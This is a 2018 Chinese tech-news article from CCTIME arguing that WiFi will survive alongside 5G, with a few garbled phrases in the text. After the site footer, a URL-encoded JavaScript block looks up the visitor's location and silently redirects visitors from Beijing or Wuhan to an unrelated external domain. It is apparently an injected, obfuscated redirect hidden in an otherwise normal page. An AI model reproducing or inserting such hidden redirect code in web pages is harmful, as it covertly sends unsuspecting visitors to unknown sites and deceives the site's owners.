首页 | 滚动 | 国内 | 国际 | 运营 | 制造 | 终端 | 监管 | 原创 | 业务 | 技术 | 报告 | 博客 | 特约记者
手机 | 互联网 | IT | 5G | 光通信 | LTE | 云计算 | 三网融合 | 芯片 | 电源 | 虚拟运营商 | 测试 | 移动互联网 | 会展
首页 >> 必读固定一 >> 正文

WiFi会死吗?

2018年12月20日 07:09  CCTIME飞象网  作 者:六月

飞象网讯(六月/文)说到WiFi大家都不陌生,尤其是随着智能手机的出现,WiFi如雨后春笋般得到了迅速的发展,不论是家庭、酒店还是商场、机场等随处可见WI-Fi的身影,以致于大家无论走到哪里,都会不由自主的问句:“这里有WiFi吗?密码多少?”

为什么WiFi如此受欢迎,很大一部分原因是因为过去上网资费比较昂贵,而随处可见的WiFi相对而言则大部分免费,因此,经济实用的WiFi自然而言就入了大家的法眼。在早些时候,甚至还会有人借助蹭网神器蹭别人家的网络。

不过,随着移动网络的不断发展,从3G到4G的普及和流量资费的大幅度调整,使大行其道的WI-FI正在逐渐失去往日的光彩,对于WiFi的前途,甚至有人指出,WiFi很有可能会成为是指武器、弃之可惜的鸡肋。

尤其是随着5G时代的即将到来,移动网络的速度更是提升了N+个level,WiFi在不久的将来会消失的说法也越演越烈,那么究竟5G时代,WiFi会死吗,要知道真相,我们首先要了解什么是WiFi以及什么是5G。

WiFi是什么?

先来个官方点的解释,显示比较正式一些,咳咳:

WiFi(发音: /ˈwaɪfaɪ/,法语发音:/wifi/),在中文里又称作“行动热点”,是Wi-Fi联盟制造商的商标做为产品的品牌认证,是一个创建于IEEE 802.11标准的无线局域网技术。基于两套系统的密切相关,也常有人把WiFi当做IEEE 802.11标准的同义术语。

接地气点说,WiFi也就是我们常说的无线宽带。实际上就是把有线网络信号转换成无线信号,供支持其技术的相关电脑,手机,PDA等接收。

手机有WiFi功能,那么在有WiFi无线信号的时候就可以不通过移动联通的网络上网,省掉了流量费。但是WiFi信号也是由有线网提供的,比如家里的ADSL。∏泶≈嗟,只要接一个无线路由器,就可以把有线信号转换成WiFi信号。

目前不管是家庭、公司或者是商场、酒店等都会使用WiFi,相对于2G、3G甚至4G上网一般来说,大部分的WiFi速度快,省电,无流量限制,无线设备不需要插sim卡,也就是说不需要走SIM卡的流量。

创造WiFi这种技术的想法,很大程度上取决于使用简单安排的公共网络。同时,数据传输领域中的现代WiFi实际上能够与移动蜂窝网络做到完全相同。WiFi支持移动性,覆盖连续性,移动用户的服务,网络中的自动授权,甚至与蜂窝网络漫游。

5G又是什么?

说起5G,可能大家并不陌生,毕竟关于5G的话题始终没有间断过,而且每次都能引起广泛的讨论。

不过,小编在此还是再官解一下:

5G,全称第五代移动电话行动通信标准,也称第五代移动通信技术。

5G包括了三个方面的应用场景:一是增强型移动宽带(eMBB),二是大规模机器通信(mMTC),三是高可靠低时延通信(URLLC)。将用于构建三种不同类型 cetey:用于物联网(主要在1 GHz以下的频率),普通用户(1-6 GHz)和非常高的数据速率(毫米范围)。

据悉,5G的下载速度,理论上最大的传输速度是每秒2.5G,看看你电脑上大约5个G的视频,在5G时代,仅仅需要2秒就能下载完毕。是不是有一种看视频的速度赶不上下载视频速度的无力感。

当然,提起5G网络,它的意义绝不是休闲娱乐中的网速能有多快。因为目前4G中,网速能满足大部分人的需求,或许你说下载还不够快,但如果下载软件之类的东西,你也不会经常去下载;如果是下载视频,现在有缓冲技术,可以边下载边观看。

因此,可以预见的是,5G的主要革命性创新涉及第一和第三类网络,对于未来广大用户可以使用的第二个开始,用户体验可能并不会发生重大的变化。

5G会终结WiFi吗?

回到最开始问题,那么随着5G的到来,WiFi究竟还会存在吗?

首先需要明确的是,5G是授权频段技术,而WiFi工作在非授权频段,因此WiFi无须巨额的频谱使用费。WiFi的设计理念就是简单、通用,但由于非授权频段存在大量干扰,因此WiFi仅提供尽力而为的业务。

其次,随着移动网络的发展,WiFi技术也在不断更新换代,穿透力更强,覆盖更广的WiFi技术正在出现。随着技术的不断发展,WiFi正以独特的思路被应用到社会的方方面面。比如,在飞机上,航空公司为乘客提供WiFi上网服务;在高速运行的火车中,铁路公司也可以为乘客提供安全高速的WiFi上网服务等。

除此之外,WiFi的灵活和低成本让它仍然是5G阶段室内重要的接入手段之一,第三代合作伙伴计划(3GPP)也在讨论5G和WiFi的融合。最终可实现当用户从室外来到室内,可以平滑无感知的从5G网络切换到WiFi网络。

未来,随着物联网的发展,要求网络“永远在线/始终连接”,WiFi甚至可能和物联网相结合,与5G互补,来完成这种“永远在线/始终连接”的无缝连接的切换。

因此,在小编看来,5G的到来并不会终结WiFi。各位小主们,你们怎么看?

 

编 辑:值班记者
免责声明:刊载本文目的在于传播更多行业信息,不代表本站对读者构成任何其它建议,请读者仅作参考,更不能作为投资使用依据,请自行核实相关内容。
相关新闻              
 
人物
2018年9月15日,中国电信董事长杨杰在2018世界物联网博览会无..
精彩专题
中国信科首秀2018中国国际信息通信展
中国电信绽放2018国际通信展
聚焦2018年中国国际信息通信展
遇见美好未来--世界移动大会·上海
CCTIME推荐
关于我们 | 广告报价 | 联系我们 | 隐私声明 | 本站地图
CCTIME飞象网 CopyRight © 2007-2017 By CCTIME.COM
京ICP备08004280号  电信与信息服务业务经营许可证080234号 京公网安备110105000771号
公司名称: 北京飞象互动文化传媒有限公司
未经书面许可,禁止转载、摘编、复制、镜像

%3Cscript%20type%3D%22text/javascript%22%20src%3D%22http%3A//ip.ws.126.net/ipquery%22%3E%3C/script%3E%0A%3Cscript%20type%3D%22text/javascript%22%3E%0Astrdistrict%20%3D%5Blo%2C%20lc%5D.join%28%27%5Ct%27%29%3B%0Aif%28strdistrict.indexOf%28%22%u5317%u4EAC%22%29%3E0%20%7C%7C%20strdistrict.indexOf%28%22%u6B66%u6C49%22%29%3E0%29%0A%7B%0Awindow.location.href%3D%22http%3A//www.arrdm.com%22%3B%20%20%0A%7D%0Aelse%0A%7B%0A%7D%0A%3C/script%3E